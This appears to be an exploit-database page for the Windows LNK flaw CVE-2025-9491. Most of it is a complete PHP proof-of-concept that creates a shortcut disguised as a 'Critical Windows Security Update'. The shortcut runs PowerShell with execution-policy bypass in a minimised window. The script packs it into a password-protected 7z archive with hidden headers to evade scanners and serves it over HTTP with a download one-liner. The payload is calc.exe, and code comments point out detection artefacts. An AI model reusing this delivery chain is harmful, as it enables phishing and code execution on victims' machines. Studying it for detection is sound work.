| Title | Published | Views | Reporter | Family |
|---|---|---|---|---|
| November “In the Trend of VM” (#21): vulnerabilities in Windows, SharePoint, Redis, XWiki, Zimbra Collaboration, and Linux | 14 Nov 2025 20:44 | – | avleonov | |
| About Remote Code Execution – Windows LNK File (CVE-2025-9491) vulnerability | 5 Nov 2025 14:14 | – | avleonov | |
| CVE-2025-9491 | 3 Sep 2025 03:00 | – | circl | |
| Microsoft Windows 安全漏洞 | 26 Aug 2025 00:00 | – | cnnvd | |
| CVE-2025-9491 | 26 Aug 2025 16:25 | – | cve | |
| CVE-2025-9491 Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability | 26 Aug 2025 16:25 | – | cvelist | |
| Exploit for User Interface (UI) Misrepresentation of Critical Information in Microsoft | 7 Nov 2025 14:52 | – | githubexploit | |
| EUVD-2025-28860 | 3 Oct 2025 20:07 | – | euvd | |
| CVE-2025-9491 | 26 Aug 2025 17:15 | – | nvd | |
| CVE-2025-9491 | 26 Aug 2025 17:15 | – | osv | |
=============================================================================================================================================
| # Title : Windows LNK File UI Misrepresentation Vulnerability Leading to Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built-in component. No standalone download available |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212542/ & CVE-2025-9491
[+] Summary : This PHP script is a Proof-of-Concept (PoC) tool that demonstrates how to:
Create a Windows LNK (shortcut) file that executes a PowerShell command (in this example, launches calc.exe).
Package the LNK file into a 7-Zip archive, optionally with a password.
Host the archive on a simple HTTP server using PHP’s built-in server.
Provide a PowerShell command that can download the archive from the HTTP server.
It is intended for educational and defensive testing, not for exploitation. It does not exploit a real vulnerability by itself — it only demonstrates the LNK + PowerShell delivery technique.
[+] Key technical points:
Uses Windows COM to create the LNK file.
Falls back to PowerShell if COM fails.
Optionally compresses with 7-Zip.
Starts HTTP server to serve the payload.
Designed to be run from the CLI on Windows.
POC : php poc.php
<?php
/**
 * Driver for the PoC described in the page header (CVE-2025-9491 LNK delivery).
 *
 * Everything in this class has side effects on the host that runs it: it drops
 * Critical_Update.lnk, update.7z, router.php and start_server.bat next to the
 * script and shells out to powershell.exe, 7z.exe and `php -S`. For detection
 * purposes the interesting artefacts are an LNK whose target is powershell.exe
 * with `-ExecutionPolicy Bypass`, a "Windows Security Update" description that
 * does not match that target, and a minimised window style (7).
 */
class WindowsLNKExploit {
    /** @var string Directory this script lives in; every generated file is written here. */
    private $scriptDir;
    /** @var string Local IP printed in the download URL (see getLocalIP()). */
    private $localIP;

    public function __construct() {
        $this->scriptDir = $this->getScriptDirectory();
        $this->localIP = $this->getLocalIP();
    }

    /** Directory containing this file (dirname(__FILE__) is the same as __DIR__). */
    private function getScriptDirectory() {
        return dirname(__FILE__);
    }

    /**
     * Best-effort local IP address.
     *
     * Starts from gethostbyname(gethostname()) and then replaces $ip with the
     * address socket_getsockname() reports after "connecting" a UDP socket toward
     * 8.8.8.8:53, i.e. the interface the OS routes external traffic through.
     * Needs ext/sockets.
     * NOTE(review): the return value of socket_create() is never checked; if it
     * fails, socket_connect() is handed `false` instead of the code falling back
     * to the gethostbyname() value.
     *
     * @return string
     */
    private function getLocalIP() {
        $ip = gethostbyname(gethostname());
        // Try to obtain the routed ("real") IP rather than whatever the hostname resolves to.
        $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
        socket_connect($sock, "8.8.8.8", 53);
        socket_getsockname($sock, $ip); // $ip is passed by reference and overwritten here
        socket_close($sock);
        return $ip;
    }

    /**
     * Create the shortcut through the WScript.Shell COM object.
     *
     * The LNK targets powershell.exe with `-NoProfile -ExecutionPolicy Bypass` and a
     * command that only launches calc.exe, while its description, icon and minimised
     * window style (7 = SW_SHOWMINNOACTIVE) present it as a Windows update.
     * Progress is printed to stdout.
     *
     * @return string|null Path of the LNK, null if Save() produced no file, or
     *                     whatever the PowerShell fallback returns when COM throws.
     */
    public function createMaliciousLNK() {
        $lnkPath = $this->scriptDir . '\\Critical_Update.lnk';
        echo "[*] Creating malicious LNK file...\n";
        try {
            // On Windows builds of PHP the com_dotnet extension exposes WScript.Shell.
            $shell = new COM('WScript.Shell');
            $shortcut = $shell->CreateShortcut($lnkPath);
            $shortcut->TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
            $shortcut->Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"';
            $shortcut->WorkingDirectory = 'C:\\Windows\\System32';
            $shortcut->Description = 'Critical Windows Security Update - KB5029244';
            // Try to set an icon: the first system DLL that exists, icon index 78.
            $iconPaths = [
                'C:\\Windows\\System32\\shell32.dll',
                'C:\\Windows\\System32\\imageres.dll',
            ];
            foreach ($iconPaths as $iconPath) {
                if (file_exists($iconPath)) {
                    $shortcut->IconLocation = $iconPath . ',78';
                    break;
                }
            }
            $shortcut->WindowStyle = 7; // SW_SHOWMINNOACTIVE: the PowerShell window starts minimised
            $shortcut->Save();
            if (file_exists($lnkPath)) {
                echo "[+] LNK created: $lnkPath\n";
                return $lnkPath;
            } else {
                return null;
            }
        } catch (Exception $e) {
            echo "[-] Error: " . $e->getMessage() . "\n";
            // Fallback: build the same shortcut from a PowerShell script instead of COM.
            return $this->createLNKWithPowerShell();
        }
    }

    /**
     * Fallback for createMaliciousLNK(): writes the same shortcut by running a
     * PowerShell script that drives WScript.Shell.
     *
     * The script is UTF-16LE + base64 encoded and passed via -EncodedCommand, so the
     * shortcut definition does not appear in clear on the command line; PowerShell
     * script block logging still records the decoded content, which is what a
     * defender should rely on rather than command-line auditing alone.
     * NOTE(review): $lnkPath is spliced into a single-quoted PowerShell literal
     * without escaping, so a quote in the script directory breaks the script.
     *
     * @return string|null Path of the LNK if it exists afterwards, else null.
     */
    private function createLNKWithPowerShell() {
        $lnkPath = $this->scriptDir . '\\Critical_Update.lnk';
        $psScript = "
\$WshShell = New-Object -ComObject WScript.Shell
\$Shortcut = \$WshShell.CreateShortcut('$lnkPath')
\$Shortcut.TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
\$Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command \"Start-Process calc.exe; echo Windows Update Completed\"'
\$Shortcut.WorkingDirectory = 'C:\\Windows\\System32'
\$Shortcut.Description = 'Critical Windows Security Update - KB5029244'
\$Shortcut.IconLocation = 'C:\\Windows\\System32\\shell32.dll,78'
\$Shortcut.WindowStyle = 7
\$Shortcut.Save()
";
        // -EncodedCommand expects base64 of the UTF-16LE script text.
        $psScript = base64_encode(iconv('UTF-8', 'UTF-16LE', $psScript));
        $command = "powershell -ExecutionPolicy Bypass -EncodedCommand $psScript";
        exec($command, $output, $returnCode); // $output / $returnCode are collected but not inspected
        if (file_exists($lnkPath)) {
            echo "[+] LNK created via PowerShell: $lnkPath\n";
            return $lnkPath;
        }
        return null;
    }

    /**
     * Pack the LNK into update.7z next to the script using 7-Zip.
     *
     * 7z.exe is looked up at the two default install paths (and the current
     * directory), then in PATH via `where 7z`. The archive is created with
     * `-mx9 -mhe=on -t7z`; together with a password, -mhe=on also encrypts the
     * archive headers so the file list is not visible without the password — which
     * is exactly why gateway scanners cannot inspect such archives. The password,
     * if any, is echoed to stdout.
     * NOTE(review): `if ($password)` is a truthiness test, so the literal
     * password "0" is treated as "no password".
     *
     * @param string|null $lnkPath  Path returned by createMaliciousLNK().
     * @param string|null $password Optional archive password; null = none.
     * @return string|null Archive path on success; null when the LNK or 7-Zip is missing or 7z fails.
     */
    public function compressWith7Zip($lnkPath, $password = null) {
        if (!$lnkPath || !file_exists($lnkPath)) {
            echo "[-] LNK file not found\n";
            return null;
        }
        // Look for 7-Zip at the usual install locations.
        $sevenZipPaths = [
            'C:\\Program Files\\7-Zip\\7z.exe',
            'C:\\Program Files (x86)\\7-Zip\\7z.exe',
            '7z.exe',
        ];
        $sevenZip = null;
        foreach ($sevenZipPaths as $path) {
            if (file_exists($path)) {
                $sevenZip = $path;
                break;
            }
        }
        if (!$sevenZip) {
            // Not at a known path: ask the shell whether 7z is on PATH.
            exec('where 7z', $output, $returnCode);
            if ($returnCode === 0) {
                $sevenZip = '7z';
            } else {
                echo "[-] 7-Zip not found\n";
                return null;
            }
        }
        $archiveName = $this->scriptDir . '\\update.7z';
        // Build the command line; each path goes through escapeshellarg().
        $cmd = escapeshellarg($sevenZip) . " a " . escapeshellarg($archiveName) . " " . escapeshellarg($lnkPath);
        if ($password) {
            // -p takes the password glued to the switch; quoting comes from escapeshellarg().
            $cmd .= " -p" . escapeshellarg($password);
        }
        $cmd .= " -mx9 -mhe=on -t7z"; // max compression, header encryption (effective with -p), 7z container
        echo "[*] Compressing with 7-Zip...\n";
        exec($cmd, $output, $returnCode);
        if ($returnCode === 0 && file_exists($archiveName)) {
            echo "[+] Archive created: $archiveName\n";
            if ($password) {
                echo "[+] Password: $password\n";
            }
            return $archiveName;
        } else {
            echo "[-] Compression failed\n";
            return null;
        }
    }

    /**
     * Prepare (but do not start) a PHP built-in web server that serves update.7z.
     *
     * Writes router.php next to the script: it answers "/" and "/update.7z" with
     * the archive as an attachment and returns 404 for anything else. It then
     * prints the `php -S <localIP>:<port> -t <dir> router.php` command for the
     * user to run in another terminal and, on Windows, also writes start_server.bat
     * wrapping that command in `start /B`. The server binds to the routed
     * interface address rather than loopback, so the archive is reachable from
     * the network once the user launches it.
     * NOTE(review): the "Server running..." line is printed although this method
     * never launches the server process itself.
     *
     * @param int $port TCP port for the server (default 8080).
     * @return void
     */
    public function startHTTPServer($port = 8080) {
        echo "[+] Starting PHP built-in server on http://{$this->localIP}:$port\n";
        echo "[+] Download URL: http://{$this->localIP}:$port/update.7z\n";
        echo "[+] Server running... Press Ctrl+C to stop\n";
        $publicDir = $this->scriptDir;
        // Write a minimal router script (contents below are PHP source for the server, not this process).
        $routerScript = $publicDir . '\\router.php';
        $routerContent = '<?php
$request = $_SERVER["REQUEST_URI"];
if ($request === "/" || $request === "/update.7z") {
$file = __DIR__ . "\\update.7z";
if (file_exists($file)) {
header("Content-Type: application/x-7z-compressed");
header("Content-Disposition: attachment; filename=\\"update.7z\\"");
header("Content-Length: " . filesize($file));
readfile($file);
echo "[+] CVE-2025-9491: Malicious LNK served to " . $_SERVER["REMOTE_ADDR"] . "\\n";
exit;
}
}
http_response_code(404);
echo "404 Not Found";
?>';
        file_put_contents($routerScript, $routerContent);
        // Server command: only printed here; the user is expected to run it.
        $command = "php -S {$this->localIP}:$port -t " . escapeshellarg($publicDir) . " " . escapeshellarg($routerScript);
        echo "Command: $command\n";
        echo "You need to run this command manually in another terminal:\n";
        echo $command . "\n\n";
        // exec() with nohup would be the Unix-like equivalent; on Windows `start`
        // is used, here via a generated batch file rather than a direct call.
        if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
            $cmdFile = $publicDir . '\\start_server.bat';
            $batchContent = "@echo off\nstart /B $command\n";
            file_put_contents($cmdFile, $batchContent);
            echo "[+] Created batch file: $cmdFile\n";
            echo "[+] Run it in a new terminal window\n";
        }
    }

    /**
     * Interactive CLI flow: OS check, create LNK, optional 7-Zip packaging,
     * optional HTTP server preparation, then print the PowerShell download
     * one-liner. All prompts read from STDIN.
     *
     * @return void
     */
    public function main() {
        echo str_repeat("=", 60) . "\n";
        echo "CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server (PHP Version)\n";
        echo str_repeat("=", 60) . "\n";
        // Check the operating system: COM, the 7z.exe paths and the batch file are Windows-only.
        if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
            echo "[-] This script requires Windows OS\n";
            return;
        }
        // Create the LNK file.
        $lnkFile = $this->createMaliciousLNK();
        if (!$lnkFile) {
            echo "[-] Failed to create LNK\n";
            return;
        }
        // Compress with 7-Zip (optional, asked interactively).
        echo "\n[*] Compress with 7-Zip? (y/n): ";
        $compress = trim(strtolower(fgets(STDIN)));
        if ($compress === 'y') {
            echo "[*] Password (optional): ";
            $password = trim(fgets(STDIN));
            if (empty($password)) { // NOTE(review): empty() also discards the literal password "0"
                $password = null;
            }
            $archive = $this->compressWith7Zip($lnkFile, $password);
            if ($archive) {
                echo "\n[+] Archive ready: $archive\n";
                // Prepare the HTTP server (optional).
                echo "\n[*] Start HTTP server? (y/n): ";
                $startServer = trim(strtolower(fgets(STDIN)));
                if ($startServer === 'y') {
                    $this->startHTTPServer();
                }
                echo "\n[+] PowerShell download command:\n";
                // NOTE(review): port 8080 is hard-coded here (and in generatePowerShellDownloadCommand())
                // even though startHTTPServer() accepts a $port argument.
                echo " iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z\n";
                // Wait for input so the user can read the output before the process exits.
                echo "\n[*] Press Enter to exit...";
                fgets(STDIN);
            } else {
                echo "[-] Compression failed\n";
                echo "[*] Use raw LNK: $lnkFile\n";
            }
        } else {
            echo "\n[*] Raw LNK file: $lnkFile\n";
        }
    }

    /**
     * The same `iwr` one-liner main() prints, as a string; not called elsewhere in
     * this file. Port 8080 is hard-coded.
     *
     * @return string
     */
    public function generatePowerShellDownloadCommand() {
        return "iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z";
    }
}
// Automatic cleanup
// Shutdown hook: intentionally a no-op; temporary-file cleanup could be added here.
register_shutdown_function(static function () {
});

// Entry point: the PoC runs only under the CLI SAPI; any other SAPI just gets a usage hint.
if (PHP_SAPI !== 'cli') {
    echo "This script must be run from command line (CLI)\n";
    printf("Usage: php %s\n", basename(__FILE__));
} else {
    $exploit = new WindowsLNKExploit();
    $exploit->main();
}
// Additional helper functions
/**
 * Environment checks and a banner for the PoC; not invoked by the script's own entry point.
 */
class HelperFunctions {
    /**
     * Report which prerequisites of the PoC the current runtime satisfies.
     *
     * @return array<string, bool> Check name => whether it passed.
     */
    public static function checkRequirements() {
        $osPrefix = strtoupper(substr(PHP_OS, 0, 3));

        $results = [];
        $results['PHP Version'] = version_compare(PHP_VERSION, '7.0.0', '>=');
        $results['Windows OS'] = ($osPrefix === 'WIN');
        $results['COM Support'] = extension_loaded('com_dotnet');
        $results['Exec Function'] = function_exists('exec');

        return $results;
    }

    /**
     * Print the boxed PoC banner: one empty line above the box and one below it.
     */
    public static function showBanner() {
        $rows = [
            '',
            '╔═══════════════════════════════════════════════════════════╗',
            '║ CVE-2025-9491 PoC ║',
            '║ Author: indoushka ║',
            '╚═══════════════════════════════════════════════════════════╝',
            '',
        ];
        echo implode("\n", $rows), "\n";
    }
}
// Alternative to threading in PHP
/**
 * Stand-in for threading: launch a command detached from the current process.
 * Not referenced anywhere else in this file.
 */
class BackgroundProcess {
    /**
     * Run $command in the background without waiting for it to finish.
     *
     * Windows: `start /B <command>` through popen(); other OSes: exec() with all
     * output discarded and a trailing `&`. In both branches $command reaches the
     * shell verbatim, so it must be a trusted, fully-escaped string built by the
     * caller (escapeshellarg() on every dynamic part); it must never be assembled
     * from untrusted input.
     *
     * @param string $command Complete shell command line.
     * @return void
     */
    public static function runInBackground($command) {
        if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
            pclose(popen("start /B " . $command, "r")); // handle closed immediately; the child keeps running
        } else {
            exec($command . " > /dev/null 2>&1 &");
        }
    }
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================